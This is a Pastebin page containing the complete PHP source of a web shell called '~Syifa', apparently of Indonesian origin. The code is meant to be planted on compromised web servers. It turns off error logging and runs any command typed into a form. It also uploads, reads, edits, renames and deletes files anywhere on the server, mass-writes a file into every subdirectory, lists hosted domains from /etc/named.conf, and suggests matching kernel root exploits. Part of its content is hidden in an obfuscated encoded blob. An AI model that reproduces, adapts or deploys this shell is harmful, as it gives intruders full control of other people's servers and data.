Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- error_reporting(0);
- @ini_set('error_log', NULL);
- @ini_set('log_errors', 0);
- class shell{
- public $getcwd;
- public $uname;
- public $host;
- public $server_ip;
- public $your_ip;
- public $menu;
- public $time;
- public $data;
- public function __construct(){
- $this->getcwd = getcwd();
- $this->uname = php_uname('a');
- $this->host = $_SERVER['HTTP_HOST'];
- $this->server_ip = $_SERVER['SERVER_ADDR'];
- $this->your_ip = $_SERVER['REMOTE_ADDR'];
- $this->menu = "";
- $this->time = date('d M Y H:i:s');
- }
- // safe_mode
- public function safe_mode($on,$off){
- if(@ini_get("safe_mode")){
- return $on;
- }else{
- return $off;
- }
- }
- // ukuran (file)
- public function size($size){
- if($size >= 1073741824){
- return round($size/1073741824, 1)." GB";
- }elseif($size >= 1048576){
- return round($size/1048576, 1)." MB";
- }elseif($size >= 1024){
- return round($size/1024, 2)." KB";
- }else{
- return $size." B";
- }
- }
- //buat exec command
- public function execute($exe){
- if($s = shell_exec($exe)){
- return $s;
- }elseif($s = exec($exe)){
- return $s;
- }elseif($s = system($exe)){
- return $s;
- }elseif($s = passthru($exe)){
- return $s;
- }
- }
- //disable function
- public function dfunction($o,$n){
- if(@ini_get("disable_functions")){
- return $o;
- }else{
- return $n;
- }
- }
- public function menu($p){
- $this->menu .= "<span><a href=\"".$_SERVER['PHP_SELF']."\">Home</a></span>";
- $this->menu .= "<span><a href=\"?about\">About</a></span>";
- $this->menu .= "<span><a href=\"?upload&dir=".$p."\">Upload</a></span>";
- $this->menu .= "<span><a href=\"?exec&dir=".$p."\">Exec</a></span>";
- $this->menu .= "<span><a href=\"?mass&dir=".$p."\">Mass File</a></span>";
- $this->menu .= "<span><a href=\"?domain&dir=".$p."\">Domain</a></span>";
- $this->menu .= "<span><a href=\"?root&dir=".$p."\">Root Vuln</a></span>";
- $this->menu .= "<span><a href=\"?newfile&dir=".$p."\">New File</a></span>";
- $this->menu .= "<span><a href=\"?newfolder&dir=".$p."\">New Folder</a></span>";
- $this->menu .= "<span><a href=\"?kill&dir=".$p."\">Kill Me</a></span>";
- return $this->menu;
- }
- public function root_vuln(){
- $version_kernel = php_uname('r');
- $version = explode('-', $version_kernel);
- echo "<br>SystemKernel : ".php_uname('-a')."<br>";
- $exploits = array(
- 'w00t' =>
- '2.4.18','2.4.10','2.4.21','2.4.19','2.4.17','2.4.16','
- 2.4.20',
- 'brk' => '2.4.22','2.4.21','2.4.10','2.4.20',
- 'elflbl' => '2.4.29',
- 'expand_stack' => '2.4.29',
- 'h00lyshit' => '2.6.8','2.6.10','2.6.11','2.6.12',
- 'kdump' => '2.6.13',
- 'km2' => '2.4.18','2.4.22',
- 'krad' => '2.6.11',
- 'krad3' => '2.6.11','2.6.9',
- 'local26' =>'2.6.13',
- 'mremap_pte'=>'2.4.20','2.2.25','2.4.24',
- 'newlocal'=>'2.4.17','2.4.19',
- 'ong_bak'=>'2.4.','2.6.',
- 'ptrace'=>'2.2.24','2.4.22',
- 'ptrace_kmod'=>'2.4.','2.6.',
- 'ptrace24'=>'2.4.9',
- 'pwned'=>'2.4.','2.6.',
- 'py2'=>'2.6.9','2.6.17','2.6.15','2.6.13',
- 'raptor_prctl'=>'2.6.13','2.6.17','2.6.16','2.6.13',
- 'prctl3'=>'2.6.13','2.6.17','2.6.9',
- 'stackgrow2'=>'2.4.29','2.6.10',
- 'uselib24'=>'2.4.29','2.6.10','2.4.22','2.4.25',
- 'exp.sh'=>'2.6.9','2.6.10','2.6.16','2.6.13',
- 'prctl'=>'2.6.',
- 'kmdx'=>'2.6.','2.4.');
- $rootexploit = array_search($version[0], $exploits);
- if($rootexploit==NULL){
- echo "RootExploit : Tidak ada
- RootExploit tersebut pada daftar kami";
- }else{
- echo "RootExploit : ".$rootexploit;
- }
- }
- public function modified($m){
- $filemtime = filemtime($m);
- $date = date("d M Y H:i", $filemtime);
- return $date;
- }
- public function delete_d($de){
- $gl = glob($de.'*', GLOB_MARK);
- foreach($gl as $dir_d){
- $del = (is_dir($dir_d)) ? $this->delete_d($dir_d) : unlink($dir_d);
- }
- if(is_dir($de)) @rmdir($de);
- }
- public function perms($fi){
- $perms = fileperms($fi);
- if(($perms & 0xC000) == 0xC000){
- // Socket
- $info = 's';
- }elseif(($perms & 0xA000) == 0xA000){
- // Symbolic Link
- $info = 'l';
- }elseif(($perms & 0x8000) == 0x8000){
- // Regular
- $info = '-';
- }elseif(($perms & 0x6000) == 0x6000){
- // Block special
- $info = 'b';
- }elseif(($perms & 0x4000) == 0x4000){
- // Directory
- $info = 'd';
- }elseif(($perms & 0x2000) == 0x2000){
- // Character special
- $info = 'c';
- }elseif(($perms & 0x1000) == 0x1000){
- // FIFO pipe
- $info = 'p';
- }else{
- // Unknown
- $info = 'u';
- }
- // Owner
- $info .= (($perms & 0x0100) ? 'r' : '-');
- $info .= (($perms & 0x0080) ? 'w' : '-');
- $info .= (($perms & 0x0040) ?
- (($perms & 0x0800) ? 's' : 'x' ) :
- (($perms & 0x0800) ? 'S' : '-'));
- // Group
- $info .= (($perms & 0x0020) ? 'r' : '-');
- $info .= (($perms & 0x0010) ? 'w' : '-');
- $info .= (($perms & 0x0008) ?
- (($perms & 0x0400) ? 's' : 'x' ) :
- (($perms & 0x0400) ? 'S' : '-'));
- // World
- $info .= (($perms & 0x0004) ? 'r' : '-');
- $info .= (($perms & 0x0002) ? 'w' : '-');
- $info .= (($perms & 0x0001) ?
- (($perms & 0x0200) ? 't' : 'x' ) :
- (($perms & 0x0200) ? 'T' : '-'));
- return $info;
- }
- public function x37($x37){
- $x64 = str_replace(hex2bin("31333337"), hex2bin("61"), $x37);
- $x86 = base64_decode(hex2bin($x64));
- return $x86;
- }
- public function server($svr){
- if(function_exists($svr)){
- return "ON";
- }else{
- return "OFF";
- }
- }
- public function help($help){
- if($this->execute($help)){
- return "ON";
- }else{
- return "OFF";
- }
- }
- }
- $obj = new shell;
- $obj->data = (object) array("title"=>"~Syifa", "version"=>"Trial !", "coder"=>"Adip Perdana");
- $title = $obj->data->title;
- $version = $obj->data->version;
- $coder = $obj->data->coder;
- //background
- echo "<html>
- <head>
- <title>".$title." ".$version."</title>
- <style media=\"all,handheld\">
- body{color: #fff; font-size: 12px; font-family: sans-serif; background-color: #222;background-repeat: no-repeat; background-position: bottom;}
- input{background-color: #333; color: #fff; border: 1px solid black;}
- td{background-color: #333; padding: 2px;font-size: 12px; color: white;text-align: center;}
- textarea{background-color: #333; color: #fff; border: 1px solid black;min-height: 200px;}
- a{color: white;text-decoration: none;font-size: 12px;display: inline-block;}
- #footer{text-align: right;font-size: 8px;}
- span a{background: #333;color: #fff;padding: 3px;margin: 2px 2px 0 0;text-align: center;display: inline-block;}
- </style>
- </head>
- <body>
- <center>
- ";
- $indo = "rVS7buMwEPwlPZwPMMDA0AG7Bg2yoFoVRsioTsSvv5klZSTNVVcYsL2PmZ2dpYbroDVdtJZRXPqWKrPWJz7+Td1zWIN8aY6j1u2iuyAnVnXvVepW8b3lh+d0d8i7CfL8pFUmCXHW7BF77JrLIHmrGqwOOa1O6nVY8waccqTsq2aLz3e37nrzswSp6DXobQEue7W45nToHkcJCf+VKlneDDMj35V6D+C++6HVE7cA8/GpdRnuIXXs2OPs5UfwmxRaIMZa9jqQwxm/fvAqmhfijeQOnFlvsfFxG3AxS7gi5ruO0NQwIrlP94BeO3oGavafsXJBH+S4NPW5voGPuj8fmqEh91cZixdyaTtY0Gf9OPdydydv+01MaLJMqUZgcd9ywY7Bqe+d/fL6ifpf+wPWhO+DukeRfcGcL19Bg3TmYVcPYJNbbJ4Bf4H3xLy3AXdDj4K47zt7J15Ry0sH+WNezL6MrYcfMU9R+MI84LauP7RqWkLfzbwJvaeU2UPgXXpqAQ59dJ3UYRa3nDoSB/5YM3Sc1vAo7KHmx4Ra7IN51CYUxP1bmxk8duQ7uyPOAk0893XYHFUO1kM3xtkfd/KOHVh/zEFPFMTPGxPekPE8cxo/alEQPzWSH3eBu87PUzNwME1w0+Qi6IOZgNFvdVpzgt6219n0evn42rHAeScX8wM8ih3ibeBM3TPkfb4PM96T2mfL3WOD5cKr6GEaww8DvaUBPnrtIA7pX56xvDjxLjqvivcC+yceeXHu2LWW7vkF89n88Lx8c5fwyNH72g02rzeNqO8vzuatyHfxzMEdm47YMd7H1z4iNZ/tXWl3Cs95eph8u/e4r0emj9bcb4pa78tf";
- //border :1px solid green
- echo "<p style=\"text-align: left;\">Kernel : ".$obj->uname."<br>";
- echo "Disable function : ".$obj->dfunction(@ini_get("disable_functions"),"NONE")."<br>";
- echo "Safe mode : ".$obj->safe_mode("ON","OFF")."<br>";
- echo "Host : ".$obj->host." | Server ip : ".$obj->server_ip." | Your ip : ".$obj->your_ip." | Time Server : ".$obj->time.
- "<br>MySQL : ".$obj->server('mysql_connect')." | MSSQL : ".$obj->server('mssql_connect')." | cURL : ".$obj->server('curl_version')." | Oracle : ".$obj->server('ocilogon')." | wget : ".$obj->help('wget --help')." | Perl : ".$obj->help('perl -h').
- "</p>";
- //path getcwd
- if(isset($_GET['dir'])){
- $obj->getcwd = $_GET['dir'];
- }else{
- $obj->getcwd = getcwd();
- }
- $str = str_replace("\\", "/", $obj->getcwd);
- $exp = explode("/", $str);
- foreach($exp as $k=>$path){
- echo "<a href=\"?dir=";
- for($i=0;$i<=$k;$i++){
- echo $exp[$i];
- if($i!=$k){
- echo "/";
- }
- }
- echo "\">".$path."</a>";
- echo "/";
- }
- //menu
- echo "<p style=\"text-align: left;\">".$obj->menu($obj->getcwd)."</p>";
- $up = $obj->getcwd;
- if(isset($_GET['about'])){
- echo "</center>".$obj->x37(base64_decode(gzinflate(base64_decode($indo))));
- }elseif(isset($_GET['upload']) && isset($_GET['dir'])){
- echo "<br>".$_GET['dir'];
- echo "<br>Upload File :
- <form method=\"post\" enctype=\"multipart/form-data\">
- <input type=\"file\" name=\"up\">
- <input type=\"submit\" name=\"upl\" value=\"Upload\"><br></form>";
- if(isset($_POST['upl'])=="Upload"){
- if(copy($_FILES['up']['tmp_name'],$up."/".$_FILES['up']['name'])){
- $file = $_FILES['up']['tmp_name'];
- $file = $_FILES['up']['name'];
- echo "Save To ".$up."<br>";
- echo $file." Upload Success !";
- }else{
- echo $file." Upload Failed !";
- }
- }
- }elseif(isset($_GET['exec']) && isset($_GET['dir'])){
- echo "<form method=\"post\">
- <input type=\"text\" name=\"exec\">
- <input type=\"submit\" name=\"exc\" value=\"Exec command\"></form></center>";
- if(isset($_POST['exc'])){
- $exc = $_POST['exec'];
- echo "<pre>".$obj->execute($exc)."</pre>";
- }
- }elseif(isset($_GET['mass']) && isset($_GET['dir'])){
- echo "<br>".$_GET['dir'];
- echo "<br><form method=\"post\">
- <textarea name=\"mass\">
- </textarea>
- <input type=\"submit\" name=\"mass_f\" value=\"Mass File\"></form>";
- $x = "x.txt";
- if(isset($_POST['mass_f'])){
- if(file_exists($x)){
- unlink($x);
- }
- $t = touch($x);
- $fp = fopen($x, "a+");
- fwrite($fp, $_POST['mass']);
- if(is_dir($obj->getcwd)){
- if($op = opendir($obj->getcwd)){
- while(($re = readdir($op)) !== false){
- if(is_dir("$obj->getcwd/$re")){
- $homo = "$obj->getcwd/$re/homo.txt";
- if(@copy($x, $homo)){
- echo "<br>".$homo." OK";
- }
- }
- }
- }
- }
- }
- }elseif(isset($_GET['domain']) && isset($_GET['dir'])){
- get_named("/etc/named.conf");
- }elseif(isset($_GET['root']) && isset($_GET['dir'])){
- echo "<p style=\"text-align: left;\">";
- $obj->root_vuln();
- echo "</p>";
- }elseif(isset($_GET['kill']) && isset($_GET['dir'])){
- unlink(__FILE__);
- /* options file */
- // buka file
- }elseif(isset($_GET['file']) && isset($_GET['dir'])){
- echo "<p style=\"text-align: left; border: 1px solid black;\">";
- echo "File Path : ".$_GET['file']."</p>";
- $fpx = fopen($_GET['file'], "r");
- if($fpx){
- echo "<pre>";
- echo "<p style=\"text-align: left; \">";
- while(!feof($fpx)){
- echo htmlspecialchars(fread($fpx,1024));
- }
- echo "</pre></p>";
- }
- fclose($fpx);
- //edit
- }elseif(isset($_GET['edit']) &&
- isset($_GET['filepath']) && isset($_GET['dir'])){
- echo "<br>File path : ".$_GET['filepath'];
- if(isset($_POST['edt'])){
- $fop = fopen($_GET['filepath'], "w");
- if(fwrite($fop,$_POST['edt'])){
- echo "<br>Edit Success ".$obj->time;
- }else{
- echo "<br>Can't Edit This File";
- }
- fclose($fop);
- }
- echo "<form method=\"post\">
- <pre>
- <textarea name=\"edt\">";
- $get = htmlspecialchars(@file_get_contents($_GET['filepath']));
- echo $get;
- echo "</textarea></pre>
- <input type=\"submit\" value=\"Save\">";
- //rename
- }elseif(isset($_GET['rename']) && isset($_GET['filepath']) && isset($_GET['dir'])){
- echo "<br>File Path : ".$_GET['filepath'];
- echo "<br><form method=\"post\">
- Rename File :
- <input type=\"text\" name=\"rename\">
- <input type=\"submit\" value=\"Rename\"></form><br>";
- if(isset($_POST['rename'])){
- if(@rename($_GET['filepath'],$obj->getcwd."/".$_POST['rename'])){
- echo "Rename File Success";
- }else{
- echo "Can't Rename This File";
- }
- }
- }elseif(isset($_GET['delete']) && isset($_GET['filepath']) && isset($_GET['dir'])){
- if(@unlink($_GET['filepath'])){
- echo "<br>Delete File Success";
- }else{
- echo "<br>Can't Delete This File";
- }
- //end file
- /* options directory */
- }elseif(isset($_GET['drename']) && isset($_GET['dirpath']) && isset($_GET['dir'])){
- echo "<p style=\"text-align: left; border: 1px solid black;\">
- Dir Path : ".$_GET['dirpath']."</p>";
- echo "<form method=\"post\">
- <p style=\"text-align: left;\">Rename Dir :
- <input type=\"text\" name=\"dirrename\">
- <input type=\"submit\" value=\"Save\"></form></p>";
- if(isset($_POST['dirrename'])){
- if(@rename($_GET['dirpath'],$obj->getcwd."/".$_POST['dirrename'])){
- echo "Rename Dir Success";
- }else{
- echo "Can't Rename This Directory";
- }
- }
- }elseif(isset($_GET['ddelete']) && isset($_GET['dirpath']) && isset($_GET['dir'])){
- $obj->delete_d($_GET['dirpath']);
- }elseif(isset($_GET['newfile']) && isset($_GET['dir'])){
- echo "<br>".$_GET['dir'];
- echo "<br>New File :
- <form method=\"post\">
- <input type=\"text\" name=\"newfile\">
- <input type=\"submit\" value=\"Save\"><br>";
- $nfile = $_POST['newfile'];
- if(isset($nfile)){
- if(@touch("$obj->getcwd/$nfile")){
- echo "Create File Success";
- }else{
- echo "Can't Create File";
- }
- }
- }elseif(isset($_GET['newfolder']) && isset($_GET['dir'])){
- echo "<br>".$_GET['dir'];
- echo "<br>New Folder :
- <form method=\"post\">
- <input type=\"text\" name=\"nfolder\">
- <input type=\"submit\" value=\"Save\"><br>";
- $mkd = $_POST['nfolder'];
- if(isset($mkd)){
- if(@mkdir("$obj->getcwd/$mkd")){
- echo "Create Folder Success";
- }else{
- echo "Can't Create Folder";
- }
- }
- }
- else{
- $dname = array();
- $fname = array();
- if($open = @opendir($obj->getcwd)){
- while($read = @readdir($open)){
- if(is_dir("$obj->getcwd/$read")){
- $dname[] = $read;
- }elseif(is_file("$obj->getcwd/$read")){
- $fname[] = $read;
- }
- }
- closedir($open);
- }
- sort($dname);
- sort($fname);
- echo "<table border=\"0\">
- <tr>
- <td><center>Name</center></td>
- <td><center>Size</center></td>
- <td><center>Permission</td>
- <td><center>Options</center></td></tr>";
- foreach($dname as $folder){
- if($folder=="."){
- echo "
- <tr>
- <td>
- <a href=\"?dir="."$obj->getcwd"."\">[".$folder."]</a></td>
- <td><center>LINK</center></td>
- <td><center>".$obj->perms("$obj->getcwd/$folder")."</center></td>
- <td>
- <center>
- <a href=\"?drename&dirpath="."$obj->getcwd/$folder"."&dir=$obj->getcwd"."\">rename</a> <a href=\"?ddelete&dirpath="."$obj->getcwd/$folder"."&dir=$obj->getcwd"."\">delete</a>
- </td>
- </tr>";
- }elseif($folder==".."){
- echo "<tr>
- <td>
- <a href=\"?dir=$obj->getcwd"."\">[".$folder."]</a></td>
- <td><center>LINK</center></td>
- <td><center>".$obj->perms("$obj->getcwd/$folder")."</center></td>
- <td><center><a href=\"?drename&dirpath="."$obj->getcwd/$folder"."&dir=$obj->getcwd"."\">rename</a> <a href=\"?ddelete&dirpath="."$obj->getcwd/$folder"."&dir=$obj->getcwd"."\">delete</a>
- </td>
- </tr>
- ";
- }elseif(is_dir("$obj->getcwd/$folder")){
- echo "
- <tr>
- <td>
- <a href=\"?dir="."$obj->getcwd/$folder"."\">[".$folder."]</a>
- </td>
- <td><center>DIR</center></td>
- <td><center>".$obj->perms("$obj->getcwd/$folder")."</center></td>
- <td><a href=\"?drename&dirpath="."$obj->getcwd/$folder"."&dir=$obj->getcwd"."\"><center>rename</a> <a href=\"?ddelete&dirpath="."$obj->getcwd/$folder"."&dir=$obj->getcwd"."\">delete</center></a></td>
- </tr>";
- }
- }
- foreach($fname as $file){
- if(is_file("$obj->getcwd/$file")){
- echo "
- <tr>
- <td>
- <a href=\"?file="."$obj->getcwd/$file"."&dir=$obj->getcwd"."\">".$file."</a>
- </td>
- <td><center>".$obj->size(@filesize("$obj->getcwd/$file"))."</center></td>
- <td><center>".$obj->perms("$obj->getcwd/$file")."</center></td>
- <td><a href=\"?edit&filepath="."$obj->getcwd/$file"."&dir=$obj->getcwd"."\"><center>edit</a> <a href=\"?rename&filepath="."$obj->getcwd/$file"."&dir=$obj->getcwd"."\">rename</a> <a href=\"?delete&filepath="."$obj->getcwd/$file"."&dir=$obj->getcwd"."\">delete</center></a>
- </td>
- </tr>";
- }
- }
- echo "</table>
- <div id=\"footer\">Coded by ".$coder." © 2015 - ".date('Y')."</div>";
- }
- function get_named($g){
- $no=0;
- $get = @file_get_contents($g);
- if($get==NULL){
- echo "<br>Cant read /etc/named.conf";
- }else{
- echo "<table border=\"0\">
- <tr>
- <td>No</td>
- <td>Domain</td>
- </tr>";
- if(preg_match_all("#/var/named/(.*?).db#", $get, $value)? $value[1] : FALSE){
- sort($value[1]);
- $unix = array_unique($value[1]);
- foreach($unix as $domain){
- $no=$no+1;
- echo "<tr><td>".$no."</td>
- <td>".$domain."</td>
- </tr>";
- }
- }
- echo "</table>";
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement